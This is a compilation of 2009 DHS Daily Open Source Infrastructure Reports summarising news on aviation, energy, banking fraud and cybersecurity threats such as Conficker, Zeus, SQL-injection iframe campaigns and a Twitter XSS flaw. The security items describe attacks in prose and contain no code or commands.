Department of Homeland Security Daily Open Source Infrastructure Report

Monday, August 31, 2009

Complete DHS Daily Report for August 31, 2009

Daily Report

Top Stories

• The Tampa Bay Business Journal reports that the Federal Aviation Administration is investigating Southwest Airlines after a routine inspection found that the airline had installed unauthorized parts on 46 of its planes. The carrier grounded those planes for several hours on August 22 after the FAA’s inspection. (See item 22)


22. August 27, Tampa Bay Business Journal – (National) FAA investigating Southwest Airlines. The Federal Aviation Administration (FAA) is investigating Southwest Airlines after a routine inspection found that the airline had installed unauthorized parts on 46 of its planes. The Dallas-based carrier grounded those planes for several hours Saturday after the FAA’s inspection. The unauthorized part, known as a hinge fitting, goes on the airplane’s wing, an FAA spokesman said. The FAA determined that the unauthorized part “was not an immediate safety hazard,” and it is working with Southwest to find a solution. Though the FAA found no immediate safety issue, Southwest temporarily grounded the planes anyway. The 46 planes in question represent close to 10 percent of Southwest’s total fleet, but the airline would be able to accommodate passengers in the event that they were grounded. The company has extra planes available for contingencies. Source: http://www.bizjournals.com/tampabay/stories/2009/08/24/daily53.html


• According to IDG News Service, the FBI is trying to figure out who is sending unsolicited laptop computers to state governors across the United States. Some state officials are worried that the laptops may contain malicious software for accessing government computers. (See item 34)


34. August 27, IDG News Service – (National) FBI investigating laptops sent to U.S. governors. There may be a new type of Trojan Horse attack to worry about. The U.S. Federal Bureau of Investigation is trying to figure out who is sending laptop computers to state governors across the United States, including the West Virginia governor and Wyoming governor. Some state officials are worried that they may contain malicious software. According to sources familiar with the investigation, other states have been targeted too, with HP laptops mysteriously ordered for officials in 10 states. Four of the orders were delivered, while the remaining six were intercepted, according to a source who spoke on condition of anonymity because of the ongoing investigation. The West Virginia laptops were delivered to the governor’s office several weeks ago, prompting state officials to contact police, according to the state’s chief technology officer. “We were notified by the governor’s office that they had received the laptops and they had not ordered them,” he said. “We checked our records and we had not ordered them.” State officials in Vermont and Wyoming told him they have received similar unsolicited orders, he said. Although there is no evidence that the computers contain malicious code, HP confirmed on August 27 that there have been several such orders and that they have been linked to fraud. HP is working with law enforcement personnel on a criminal investigation. Criminals have tried to put malware on USB devices and then left them outside company offices, hoping someone would plug them into a computer and inadvertently install malicious software on the network. Many Windows systems are configured to automatically run software included on CDs and USB devices using a Windows feature called AutoRun. Many organized criminals would be happy to spend the cost of five PCs in order to access government computers, said the director of investigations with security consultancy Team Cymru. Source: http://www.pcworld.com/article/170970/fbi_investigating_laptops_sent_to_us_governors.html


Details

Banking and Finance Sector

15. August 28, St. Louis Business Journal – (National) Banks on FDIC’s problem list top 400. The FDIC added 111 banks to its “Problem List” in the second quarter. At the end of June, there were 416 insured institutions on the list, up from 305 on March 31. This is the largest number of institutions on the list since June 30, 1994, when there were 434 institutions on the list, according to the government fund that protects consumer deposits. Total assets of problem institutions increased during the quarter from $220 billion to $299.8 billion, the highest level since December 31, 1993. The Federal Deposit Insurance Corp. does not name the problem banks. Deteriorating loan quality in the second quarter continued to hamper commercial banks and savings institutions insured by the Federal Deposit Insurance Corp., sending them to a multi-billion-dollar loss. Banks insured by FDIC posted a loss of $3.7 billion in the second quarter, the FDIC said on August 27. This compares with a $4.8 billion profit in the second quarter of 2008. And more than 28 percent of all insured institutions reported a loss in the second quarter, compared with 18 percent a year earlier. Source: http://www.bizjournals.com/stlouis/stories/2009/08/24/daily57.html


16. August 27, ZDNet – (National) Hackers mailing malware-infested CDs to banks. Reminiscent of the days when viruses were distributed on floppy disks, cybercriminals are currently mailing infected CDs to credit unions and smaller banks as part of a clever offline scheme to load malicious software into computers with valuable data. According to an alert issued by the National Credit Union Association, a credit union reported receiving a bogus fraud advisory accompanied by two compact discs. The letter advises credit unions to review training material (contained on the CDs). Doing so could result in a possible security breach to a user’s computer system, or have other adverse consequences. The letter contains several spelling and grammatical errors but, as a researcher points out, this low-tech attack method can be highly effective because smaller businesses are not properly equipped and educated to deal with these types of threats. Source: http://blogs.zdnet.com/security/?p=4121


17. August 27, U.S. Department of Justice – (National) Stanford Financial Group CFO pleads guilty to charges related to $7 billion scheme to defraud investors. The former chief financial officer of Houston-based Stanford Financial Group (SFG) pleaded guilty Thursday to fraud and obstruction charges related to a $7 billion scheme to defraud investors. The former chief was charged in a criminal information, filed on June 18, 2009, with conspiracy to commit mail, wire and securities fraud; mail fraud; and conspiracy to obstruct a U.S. Securities and Exchange Commission (SEC) investigation. According to the plea documents, the former chief admitted that as part of the scheme, he and his co-conspirators defrauded investors who purchased approximately $7 billion in certificates of deposit (CDs) administered by Stanford International Bank Ltd. (SIBL), an offshore bank located on the island of Antigua. He further admitted that he and his co-conspirators misused and misappropriated most of those investor assets, including by diverting more than $1.6 billion into undisclosed personal loans to a co-conspirator, while misrepresenting to investors SIBL’s financial condition, its investment strategy and the extent of its regulatory oversight by Antiguan authorities. According to the plea documents, the former chief and his co-conspirators began in 1990 to make false entries into the general ledgers of SIBL relating to revenues and revenue balances. Source: http://www.usdoj.gov/opa/pr/2009/August/09-ag-880.html


18. August 27, The Register – (International) Trojan zaps banking credentials via IM. Instant messaging is being adopted by a growing number of banking malware applications, which zap pilfered credentials to thieves in real time. The latest entrant is Zeus, a trojan that monitors an infected PC for passwords entered into banking websites and other financial services. Over the past three months, investigators from RSA FraudAction Research Lab have observed the program, which also goes by the name Torpig and Mebroot, using the Jabber IM protocol to make sure the most valuable credentials do not get lost in the shuffle. The move signals the growing focus on immediacy among scammers as they try to counter the increased use of measures designed to detect and prevent banking fraud. “One of the things that has definitely changed in recent times is that the half life of a stolen credential is decreasing,” said a senior manager for identity protection and verification at RSA, a division of EMC. “There is definitely a sense of urgency of the part of these fraudsters about using the credential.” Previously, Zeus uploaded the credentials to a drop server database, which scammers periodically checked. The new method employs PHP scripts that automatically send credentials as soon as they are intercepted. That allows thieves to retrieve the information much more quickly than would otherwise be possible. It also allows retrieval even when crooks, many of whom do not always have reliable net connections, do not have access to the server hosting the drop. As a growing number of banks adopt the use of one-time passwords, the need for speedier delivery mechanisms is growing. Instant messaging makes it possible for thieves to thwart such measures by, in some cases, allowing them to silently make transactions while a victim is still logged in to an online bank. A competing trojan known as Sinowal has used similar methods since last year, RSA researchers said. Source: http://www.theregister.co.uk/2009/08/27/zeus_adopts_instant_messaging/


Information Technology


38. August 28, Tech Herald – (International) Symantec discovers Trojan targeting Skype users. Early on August 27, Symantec issued an advisory that they have discovered the availability of source code for a Trojan that targets Skype users. The Trojan, once installed on a system, has the ability to record conversations in progress, and transmit the recording to a third party. The Trojan is being called Trojan.Peskyspy, and can be delivered in any number of ways, including email links and social engineering attacks, where a user is tricked into downloading and installing an application. The Trojan is targeting Windows API hooks, a technique used to alter the planned behavior of an application, which Microsoft has intended to be used by audio applications. The Trojan compromises the machine and then through the hooking technique is able to eavesdrop on a conversation before it even reaches Skype, or any other audio application. Once a machine has been compromised, the Skype Trojan can use an application that handles audio processing within a computer and save the call data as an MP3 file. This MP3 is then sent over the Internet to a predefined server where the attacker can then listen to the recorded conversations. The MP3 is stored locally and encrypted before it is sent off. “Recording the call as an MP3 keeps the size of the audio files low and means there is less data to be transferred over the network, helping to speed up the transfer and avoid detection,” Symantec said in their alert. Presently, Symantec is calling the risk posed by this threat quite low, as they have not seen any evidence of compiled versions of the Trojan moving around online. Source: http://www.thetechherald.com/article.php/200935/4325/Breaking-Symantec-discovers-Trojan-targeting-Skype-users


39. August 28, The Register – (International) Hackers serve up pre-release malware to Mac fanboys. Virus slingers are taking advantage of the release of Apple’s Snow Leopard operating system by offering malware from sites touting operating system upgrades. Dodgy sites supposedly offering Snow Leopard were rigged to push an Apple-specific DNS changer Trojan, detected by Trend Micro as JAHLAV-K. The malware is a Mac OS X mountable Disk Image file (.DMG) that comes contaminated with various malicious scripts, as explained here. Users infected with the Apple-specific malware would find their internet connections redirected to phishing sites and other fraudulent endeavours. Some of these bogus sites hosted scareware (fake anti-virus) packages. Fake sites offering the Mac malware were in operation in the run-up to the release of Snow Leopard on August 28. There are more details in a blog on Trend Micro’s website. A similar attack, detected earlier in the week of August 24, offered malware in the guise of Foxit PDF Reader software for Apple Macs. The pirated version “Foxit Reader for Mac” comes loaded with the Jahlav Trojan horse, anti-virus firm Sophos warns. Foxit Reader is not yet officially available for Apple Macs. When it does come out, prospective users ought to use the official Foxit website, Foxit advises. Source: http://www.theregister.co.uk/2009/08/28/fake_mac_software_malware/


40. August 27, Network World – (International) Web attacks across globe appear linked, security researcher says. Three significant waves of SQL injection attacks appear to be under the control of the same source, according to one security researcher. Roughly 80,000 Web sites in China, 67,000 in the U.S. and 40,000 in India remain compromised and under botnet control as a result of separate and ongoing SQL injection attacks. The highest infection point during the last three months reached into the millions at one point in China. The SQL injection attacks have inserted malicious iFrames into legitimate Web sites in order to force visitors off them and onto dangerous malware-laden sites. A senior security researcher at ScanSafe says she believes these three waves of SQL injection attacks are likely the handiwork of the same attacker because of the similarity of the domain-name registration information and style of attack. “It’s the thread of the domain names being used,” the researcher says. Seven of these “mal-domains,” a term coined by the researcher to describe domain names used solely to build Internet infrastructure to spread malware or otherwise cause harm, were registered under the same name and address (which are clearly bogus, being not more than gibberish). These domain names are now apparently being farmed out across the world as part of the globally distinct attacks in China, U.S. and India. In this case, the identified domain names were registered using bogus information provided to registrar Go Daddy, which the researcher says is “highly unusual,” since Go Daddy has a generally good reputation and attackers typically prefer “domain name providers that turn a blind eye.” Source: http://www.networkworld.com/news/2009/082709-sql-attacks-linked.html


41. August 27, PC1News – (International) Is Worm.Deborm hiding in your LAN? Computer worms, viruses, Trojans and other threats are increasingly looking for ways to exploit systems. Some of them actively try to break into a user’s PC and others just patiently wait until the user provides the way into the system. But no matter how a threat finds its way into a PC, the most important thing is that as soon as one enters the system, the machine is at risk of being destroyed or otherwise negatively affected. That is the case with Deborm, a worm that spreads itself without any user intervention. Deborm has the ability to propagate itself via networks. In other words, Worm.Deborm spreads itself over a local area network (LAN) to any computers that have writable file shares. Once executed, Worm.Deborm will copy itself to a startup folder; as a result, it will automatically run upon reboot. This parasite has the ability to break simple passwords that are used either on the machine or when surfing the web. It is also important to note that the Deborm worm will install a backdoor that will then allow a remote attacker access to a user’s computer system. Through this backdoor cyber criminals will be able to download additional malware, execute suspicious and often malicious programs, as well as steal confidential personal and financial information. Worm.Deborm is known to be related to a file called malware.exe. It has many distinct variants with different MD5 signatures. Source: http://www.pc1news.com/news/0961/worm-deborm.html

For another story, see item 42 below

Communications Sector

42. August 27, IDG News Service – (International) New attack cracks common Wi-Fi encryption in a minute. Computer scientists in Japan say they have developed a way to break the WPA encryption system used in wireless routers in about one minute. The attack gives hackers a way to read encrypted traffic sent between computers and certain types of routers that use the WPA (Wi-Fi Protected Access) encryption system. The attack was developed by two professors who plan to discuss further details at a technical conference set for September 25 in Hiroshima. In November 2008, security researchers first showed how WPA could be broken, but the Japanese researchers have taken the attack to a new level, according to the organizer of the PacSec security conference where the first WPA hack was demonstrated. “They took this stuff which was fairly theoretical and they’ve made it much more practical,” he said. The Japanese researchers discuss their attack in a paper presented at the Joint Workshop on Information Security, held in Kaohsiung, Taiwan earlier in August. The earlier attack, developed by two researchers, worked on a smaller range of WPA devices and took between 12 and 15 minutes to work. Both attacks work only on WPA systems that use the Temporal Key Integrity Protocol (TKIP) algorithm. They do not work on newer WPA 2 devices or on WPA systems that use the stronger Advanced Encryption Standard (AES) algorithm. Source: http://www.computerworld.com/s/article/9137177/New_attack_cracks_common_Wi_Fi_encryption_in_a_minute?taxonomyId=17

Department of Homeland Security Daily Open Source Infrastructure Report

Friday, August 28, 2009

Complete DHS Daily Report for August 28, 2009

Daily Report

Top Stories

• According to the Associated Press, a fire broke out Thursday at Sterling Services, a bulk petroleum facility, in Hamtramck, Michigan, sending flames and black smoke hundreds of feet into the air, interrupting Amtrak passenger rail service, and forcing hundreds of people to evacuate the area. (See item 3)


3. August 27, Associated Press – (Michigan) Fire rages at chemical plant near Detroit. A fire broke out Thursday at a chemical plant in Hamtramck, near Detroit, sending flames and black smoke hundreds of feet into the air, interrupting Amtrak passenger rail service, and forcing hundreds of people to evacuate the area. The fire broke out about 11:30 a.m., and Hamtramck officials quickly called in the Detroit and Highland Park fire departments for assistance. The fire is at Sterling Services, a company involved in the biofuel business. There were no reports of injuries. Amtrak passenger rail service was suspended between Pontiac and Detroit, about 20 miles apart. An Amtrak spokesman said passengers will be shuttled between the cities by charter bus. Residents were evacuated for about a half-mile around the fire, said the executive director of the Hamtramck Housing Commission. That included a nearby complex of 36 buildings containing 300 apartments and some 700 to 800 residents, though he said not all were home at the time of the blaze. An evacuation center was set up at a nearby senior center with water available for evacuees. About 15 or 20 people had arrived by about 1 p.m. The plant is in an industrial area with several small factories. Sterling Services Ltd. is registered as a bulk petroleum facility that stores large quantities of gasoline or other fuels, said a spokesman for the Michigan Department of Environmental Quality. State or federal environmental officials will monitor air quality at the scene. Sterling Services is a subsidiary of Southfield-based Sterling Oil & Chemical Co. Inc., according to a company Web site. The Hamtramck facility is on more than five acres and has a storage capacity of about 5 million gallons. Source: http://www.google.com/hostednews/ap/article/ALeqM5goc8-VWKIhOO60FQkeT2kXp5-pMAD9ABBTNO0


• The Asbury Park Press reports that the Oyster Creek nuclear power plant in Lacey, New Jersey was operating at half its generating capacity Wednesday following a new tritium leak discovered Monday. This is the second leak since the plant was relicensed on April 8. (See item 7)


7. August 26, Asbury Park Press – (New Jersey) Oyster Creek reduces power generation to fix leak. The Oyster Creek nuclear power plant in Lacey was operating at half its generating capacity Wednesday following a new tritium leak discovered Monday. A plant spokesman said the reduction in power generation “allows us to gain safe access to the turbine building and into the 6-inch aluminum line which was found to be leaking.” A Nuclear Regulatory Commission spokesman said that the leak appears to be from an aluminum, non-safety-related condensate transfer line. “The leak is about 48 hours old, and we have a rigorous monitoring system,” the plant spokesman said Wednesday. “We contacted the state nine minutes within getting a positive hit on tritium within a water sample taken.” The plant spokesman said the plant will repair or replace the line. “There is no half-stepping on this,” he said. “They (plant engineers) will work 24 hours a day to get this done quickly and get it done right.” Environmentalists who oppose the power plant’s operation were quick to respond. The director of the New Jersey Sierra Club said, “This is the second leak since the plant was relicensed. This shows the plant is unsafe and should be closed pending an independent evaluation.” The NRC renewed Oyster Creek’s operating license on April 8. Source: http://www.app.com/article/20090826/NEWS/908260349/1070/NEWS02/Oyster+Creek+reduces+power+generation+to+fix+leak


Details

Banking and Finance Sector

14. August 27, Bloomberg – (International) Swiss negotiator for UBS says IRS may seek more data. Switzerland’s chief negotiator in the UBS AG tax case said the U.S. Internal Revenue Service may request names of American clients from other banks after the Swiss government agreed to hand over UBS account details. “It is possible that the IRS will ask for more data on U.S. customers at other Swiss banks,” the individual who led discussions for the Swiss foreign ministry said on August 26 in written comments to Bloomberg News. The individual is the country’s most senior diplomat and a mathematician by training. A disclosure similar in scope to the August 19 agreement is “questionable” because UBS is the only Swiss bank to admit unlawful behavior in its efforts to win rich U.S. clients, he said. The IRS plans to target more banks, law firms and entities that help Americans hide assets, the IRS commissioner said when the settlement was announced. While Swiss banks manage about 27 percent of the world’s offshore wealth, tax evasion through offshore accounts robs the U.S. of $100 billion annually, according to U.S. officials. Under the deal, UBS agreed to provide Swiss authorities with details of 4,450 accounts where “tax fraud or the like” is suspected. While Switzerland has a year to decide which data to pass on to the IRS, legal appeals may delay the transfer beyond that time period, according to a Swiss justice ministry spokesman. Source: http://www.bloomberg.com/apps/news?pid=20601087&sid=aH7Ud2ZQb7bg


15. August 27, WKYC 3 Cleveland – (Ohio) Cleveland: Largest mortgage scam in U.S. history uncovered here. Just as Cleveland became the foreclosure capital of the country, prosecutors say a savvy man with an eye for real estate found a way to scam and profit. The defendant, of Beachwood, was charged August 25 with masterminding the largest mortgage scam in U.S. history. For over thirty minutes, representatives from the FBI, the Ohio Attorney General’s Office and Cuyahoga County prosecutors explained in detail how the defendant capitalized on the crisis. Prosecutors allege he would enlist “straw buyers” to purchase foreclosed homes. A second set of buyers would then use false documents to acquire bank loans that allowed them to buy the home at twice the original purchase price. The defendant and his team would then pocket the difference, leaving the lenders holding the bag. In all, 453 homes were purchased with $44 million in fraudulent loans. Source: http://www.wkyc.com/news/local/news_article.aspx?storyid=120479&catid=3


16. August 27, Reuters – (National) Wilbur Ross says FDIC bank rules better. A billionaire investor said on August 27 that while he plans to invest further in banks, the capital requirements for private equity investment in the sector set by regulators yesterday are limiting. The investor, in an interview with Reuters Television, said the Federal Deposit Insurance Corp decision on Wednesday to set a Tier 1 common equity ratio at 10 percent rather than the 15 percent previously proposed did not go far enough. “We will now be able to be a bidder, whereas at the 15 percent capital level it would have been ridiculous ... We’ll be in the game, but not as aggressively as we had been,” he said. He said an equity ratio of 7.5 percent would still be 50 percent more than a typical bank must have to be well capitalized, and would reduce the capital required to buy a bank while also improving returns. He said he is particularly interested in the Sun Belt states, including Florida, Arizona, Texas and potentially Nevada, where retail deposits are strong. Source: http://www.reuters.com/article/innovationNews/idUSTRE57Q2SJ20090827


17. August 26, Virginia Gazette – (Virginia) C&F Bank warns of phishing scam. C&F Bank is warning customers about a scam targeting cell phone customers of Verizon and Sprint. According to a statement issued by the bank on August 2, the scam involves an attempt to use e-mail or text messages to extract account or personal information from people who may or may not be C&F customers. The message will ask the recipient to respond to a “problem” and ask for account numbers, passwords, etc. No bank will ask customers for sensitive account information. In this case, it appears a large number of Sprint and Verizon cellular numbers were acquired by criminals. The same message was sent to all recipients, with a bank name, in some cases C&F, inserted in the subject line. Anyone receiving the suspicious e-mails or messages is asked to call the bank and report the incident. Source: http://www.vagazette.com/articles/2009/08/26/news/doc4a95ab8fa95d3667611286.txt


Information Technology


43. August 26, Nextgov – (National) DHS to test Obama’s national cyber response plan with third large-scale exercise. The Homeland Security Department’s third large-scale cybersecurity drill in September 2010 will test the national cyber response plan currently being developed by the U.S. Presidential Administration, said industry and government participants in the simulation exercise during a conference on August 25. Cyber Storm III will build upon the lessons learned in the two previous exercises that took place in February 2006 and March 2008, and provide the first opportunity to assess the White House strategy for responding to a cyberattack with nationwide impact. “The national cyber response plan will be an offshoot of a lot of the findings that came out of Cyber Storm I and II that will formalize the roles and responsibilities,” said the director of the cyber exercises program in DHS’ national cybersecurity division. He participated on an afternoon panel at the GFirst conference in Atlanta hosted by the department’s U.S. Computer Emergency Readiness Team. “It’s not a direct cause-and-effect relationship, but a lot of questions bubbled up [from the exercises],” followed by the announcement along with the U.S. President’s 60-day cyber review that a response plan should be developed. Details of the national cyber response plan are still being finalized through weekly meetings with stakeholders from federal government and industry. An initial report is scheduled to be released in November, less than a year before Cyber Storm III kicks off, said the vice president of government affairs and critical infrastructure protection at Juniper Networks, who is among the industry representatives involved in both the plan’s development and the Cyber Storm exercises. Source: http://www.nextgov.com/nextgov/ng_20090826_9168.php?oref=topnews


44. August 26, New York Times – (International) Defying experts, rogue computer code still lurks. The rogue software program known as Conficker that glided onto the Internet last November has confounded the efforts of top security experts to eradicate the program and trace its origins and purpose, exposing serious weaknesses in the world’s digital infrastructure. Conficker uses flaws in Windows software to co-opt machines and link them into a virtual computer that can be commanded remotely by its authors. With more than five million of these zombies now under its control — government, business and home computers in more than 200 countries — this shadowy computer has power that dwarfs that of the world’s largest data centers. Computer security experts decoded the program and developed antivirus software that erased it from millions of the computers. Researchers speculate that the computer could be employed to generate vast amounts of spam; it could steal information like passwords and logins by capturing keystrokes on infected computers; it could deliver fake antivirus warnings to trick naive users into believing their computers are infected and persuading them to pay by credit card to have the infection removed. There is also a different possibility that concerns the researchers: That the program was not designed by a criminal gang, but instead by an intelligence agency or the military of some country to monitor or disable an enemy’s computers. The experts have only tiny clues about the location of the program’s authors. The first version included software that stopped the program if it infected a machine with a Ukrainian language keyboard. There may have been two initial infections — in Buenos Aires and in Kiev. The program is protected by internal defense mechanisms that make it hard to erase, and even kills or hides from programs designed to look for botnets. A member of the security team said that the FBI had suspects, but was moving slowly because it needed to build a relationship with “noncorrupt” law enforcement agencies in the countries Source: http://www.nytimes.com/2009/08/27/technology/27compute.html


45. August 26, Fileforum – (International) Microsoft Windows Server Update Service (WSUS). WSUS is the new name for the next version of Windows Update Services (WUS). WSUS (previously SUS 2.0) is a feature of Windows Server. It is a patch and update tool that offers an effective and quick way to help a user get secure and stay secure. It represents the first step toward delivering core software distribution and update management infrastructure in Windows. It has both a server and client component. WUS will support updating Windows operating systems as well as all Microsoft corporate software over time. When initially released, it will support updating Windows XP Professional, Windows 2000, Windows Server 2003, Microsoft Office XP, Office 2003, SQL Server 2000, MSDE 2000, and Exchange Server 2003. Source: http://fileforum.betanews.com/detail/Microsoft-Windows-Server-Update-Service-WSUS/1106866721/1


46. August 26, SCMagazine – (International) Twitter XSS vulnerability not yet fixed. A major cross-site-scripting vulnerability in Twitter that could result in a user’s account being taken over has yet to be fixed despite Twitter’s claim that it has, according to the software developer who discovered the bug. The developer first described the vulnerability, which allows malicious JavaScript code to be inserted into tweets, on August 25 on the blog of a search marketing executive. Twitter’s application programming interface (API), used by developers to create applications to post tweets, such as TweetDeck, TwitterFox or HootSuite, does not properly filter the URL of these programs. As a result, users could actually insert malicious JavaScript code along with a URL. “With a few minutes work, someone with a bit of technical expertise could make a Twitter ‘application’ and start sending tweets with it,” the developer explained in a blog post on August 26. “It can be arranged so that if another Twitter user so much as sees one of these tweets, and they are logged in to Twitter, their account could be taken over.” Because of the bug, attackers could capture account credentials, redirect a user to a site of their choosing, alter a user’s tweets or “followers,” or send messages from a compromised account. “The main impact is that it could be abused by anyone really, to steal your [login] details or impersonate your Twitter,” the developer, who works for the search engine optimization company Bronco Internet, told SCMagazineUS.com. Source: http://www.scmagazineus.com/twitter-xss-vulnerability-not-yet-fixed/article/147352/

Communications Sector

Nothing to report.


Thursday, August 27, 2009

Complete DHS Daily Report for August 27, 2009

Daily Report

Much more in the Information Technology and Communications Sectors than usual! Many, if not all warrant YOUR attention!

Top Stories

• PC World reports that the Air Line Pilots Association is calling on the U.S. government to temporarily ban cargo shipments of lithium batteries, saying they represent a serious safety hazard. (See item 14)


14. August 26, PC World – (International) Airline pilots want ban on lithium battery shipments. An airline pilot union is calling on the U.S. government to temporarily ban cargo shipments of lithium batteries, saying they represent a serious safety hazard. The Air Line Pilots Association (ALPA), which represents pilots in the U.S. and Canada, asked that the U.S. government prohibit shipments of lithium batteries on all cargo and passenger flights until measures are taken to insure that such shipments are safe. The proposed ban on the batteries, which are widely used in electronic devices like phones and computers, would not prohibit passengers from carrying batteries on planes. During the last two months, there have been three incidents where fire or smoke on aircraft was caused by shipments of lithium batteries. On August 14, the crew of a plane that landed in Minneapolis received a warning of smoke in the plane’s forward cargo compartment. When fire crews opened the compartment, they found flames coming from a container filled with electronic cigarettes, each containing a lithium-ion battery. In another incident in July, a container filled with lithium-ion batteries on a flight to Santo Domingo, Dominican Republic, was found smoking and smoldering. In the third incident, which took place in June, a burned package containing a lithium-ion bicycle motor was discovered when cargo handlers unloaded a plane in Honolulu. ALPA said all three incidents recall a 2006 incident where lithium batteries caused a fire on board a UPS plane that injured three crew members and damaged cargo. Source: http://www.pcworld.com/article/170815/airline_pilots_want_ban_on_lithium_battery_shipments.html


• According to Softpedia, researchers at Web security company ScanSafe advise that a new mass compromise attack is underway and has affected over 62,000 URLs to date. A rogue IFrame injected into the compromised Web pages loads a cocktail of exploits and malware from other domains. (See item 40)


40. August 25, Softpedia – (International) Over 62,000 new URLs serving exploit cocktail. Security researchers advise that a new mass compromise attack is underway and has affected over 62,000 URLs to date. A rogue IFrame injected into the compromised Web pages loads a cocktail of exploits and malware from other domains. Web security company ScanSafe has been monitoring this new threat and advises that the infection pattern is a hidden IFrame loading JavaScript content from a domain called a0v.org. A Google search for “script src= reveals 62,100 results. A senior security researcher at ScanSafe has told The Register that the infections are the result of SQL injection attacks. The x.js called from a0v.org has the role of loading exploits from seven other domain names. At the moment of writing this article, Google’s Safe Browsing was tagging a0v.org as malicious. “The malware hosting domains were registered on or after August 3, 2009 and include: ahthja.info, gaehh.info, htsrh.info, car741.info, game163.info, car963.info, and game158.info. The most prolific observed by ScanSafe thus far has been ahthja.info,” the researcher writes on the company’s blog. If exploitation is successful, several malware installers are dropped and executed onto the victim’s computer as drive-by downloads. The security researcher warns that “post infection, additional malware may also be downloaded” from a different host. The exploits target vulnerabilities in popular software, including Internet Explorer, Mozilla Firefox, Adobe Flash Player, Adobe Reader and Acrobat or avast! Antivirus. AV detection rates for the malicious executables downloaded during the attack range from poor to moderate on Virustotal. Source: http://news.softpedia.com/news/Over-62-000-New-URLs-Serving-Exploits-Cocktail-120006.shtml


Details

Banking and Finance Sector

11. August 25, Bloomberg – (National) Court orders Fed to disclose emergency bank loans. The Federal Reserve must for the first time identify the companies in its emergency lending programs after losing a Freedom of Information Act lawsuit. The Manhattan chief U.S. district judge ruled against the central bank on August 24, rejecting the argument that loan records are not covered by the law because their disclosure would harm borrowers’ competitive positions. The Fed has refused to name the financial firms it lent to or disclose the amounts or the assets put up as collateral under 11 programs, most put in place during the deepest financial crisis since the Great Depression, saying that doing so might set off a run by depositors and unsettle shareholders. Bloomberg LP, the New York-based company majority-owned by the mayor of New York, sued on November 7, 2008 on behalf of its Bloomberg News unit. “The Federal Reserve has to be accountable for the decisions that it makes,” said a U.S. Representative, who is a Florida Democrat on the House Financial Services Committee, after the judge’s ruling. “It’s one thing to say that the Federal Reserve is an independent institution. It’s another thing to say that it can keep us all in the dark.” Source: http://www.bloomberg.com/apps/news?pid=20601087&sid=a7CC61ZsieV4


12. August 25, Dow Jones Newswires – (New York) NY businessman charged with $74 million bank fraud against Citigroup. A New York man was charged with allegedly defrauding Citigroup Inc. out of $74 million in loans. The U.S. attorney in Manhattan and the Federal Bureau of Investigation say the defendant, with residences in Manhattan and Katonah, New York, fraudulently applied for the loans for Nemazee Capital Corp., of which he is chairman and chief executive. Federal prosecutors contend Nemazee obtained the money by giving the banking giant “numerous documents that purported to establish the existence of accounts in Nemazee’s name at various financial institutions containing many hundreds of millions of dollars,” the Justice Department said in a statement. “In fact, those were fraudulent and forged documents.” According to an FBI report, the defendant first contacted Citigroup’s Citibank in December 2006 to borrow $25 million, and later raised the sum to $80 million. The defendant paid back more than $74 million on August 24, after being questioned by federal agents on August 23 as he was checking in to board a flight from Newark International Airport in New Jersey to Rome. Source: http://money.cnn.com/news/newsfeeds/articles/djf500/200908251258DOWJONESDJONLINE000315_FORTUNE5.htm


13. August 25, Computerworld – (National) Cybercrooks increasingly target small business accounts. An organization representing more than 15,000 financial institutions has issued a warning about a growing wave of attacks against small banks and businesses by cybercriminals using stolen banking credentials to plunder corporate accounts. In an alert to its members earlier this month, NACHA — the Electronic Payments Association — said that attackers are increasingly stealing online banking credentials, such as user names and passwords, from small businesses by using keystroke logging tools and other malware. The cybercriminals are using the stolen credentials to “raid” and “take over” corporate accounts and initiate the unauthorized transfer of funds over electronic payment networks. NACHA oversees the Automated Clearing House (ACH) electronic payments network. NACHA’s alert said that the cybercrooks are apparently targeting small businesses because of their relative lack of strong authentication procedures, transaction controls and “red flag” reporting capabilities. In some cases, the alert said, attackers are tricking small business workers into visiting phishing sites with the same look and feel as their company’s financial institution, where they would log on using their credentials. Source: http://www.computerworld.com/s/article/9137112/Cybercrooks_increasingly_target_small_business_accounts


Information Technology


36. August 26, Network World – (International) Trojan attacks up, phishing attacks down this year, IBM finds. Spam-based phishing attacks declined noticeably during the first half of the year, but cyber-criminals may simply be shifting to other technologies found to be more effective in stealing personal data, according to IBM in its semi-annual security threat report. “The decline in phishing and increases in other areas (such as banking Trojans) indicate the attackers may be moving their resources to other methods to obtain the gains that phishing once achieved,” is the explanation offered in the “IBM Internet Security Systems 2009 Mid-Year Trend & Risk Report.” It says Russia is the top country of origin for phishing e-mails, with a 7.2 percent share, while China is the top hosting country for spam URLs. IBM’s semi-annual security report presents a broad view of trends based on its own analysis of volumes of sensor data, Web crawling technologies and other resources used to gather information through its Internet Security Systems division. In the first half of 2009, 55 percent of the new malware seen was Trojans, an increase of 9 percent over last year, the report says. Trojan malware, which includes components called downloaders and info-stealers, is mainly being used in the form of “public-available toolkits” that are “easy to use” by criminals, the report points out. The number of malicious Web links used to trick users into downloading malware or visiting dangerous sites has increased, up 508 percent in the first half of 2009 in comparison to the number discovered in the first half of 2008, says the report. The U.S. is the top country where such malicious Web links can be found, accounting for 36 percent of known malicious links, with China holding the second spot. Source: http://www.networkworld.com/news/2009/082609-ibm-malware-trojans.html


37. August 26, Daily Tech – (International) Apple reportedly using malware detection in Snow Leopard. Not wanting to be made the target of new PC ads mocking its lack of antivirus support, Apple reportedly is packaging its new OS X 10.6 “Snow Leopard”, set for release on August 28, with free antivirus software. Security research firm Intego, which maintains a Mac security blog that monitors various OS X-specific malware, first noticed and reported the development. The firm was running the new version of OS X when they noticed it detected and removed malware. The process was carried out via a popup window, which they took a screenshot of, but they were either unable to determine or chose not to announce who made the antivirus software. Intego’s post indicated that they were not making the product. ClamAV — currently the AV engine in Apple’s server operating system — also seems unlikely, as the virus detected had the signature “OSX.RSPlug.A”, a signature that ClamAV currently doesn’t support (ClamAV does have a signature for “OSX.RSPlug” [1]). Similarly, McAfee and Sophos use the names OSX/Puper.a [2] and OSX/RSPlug-A [3], respectively. That leaves Symantec as one possibility. Another is that Apple has developed its own proprietary antivirus software, which would not be surprising. Source: http://www.dailytech.com/Apple+Reportedly+Using+Malware+Detection+in+Snow+Leopard/article16083.htm


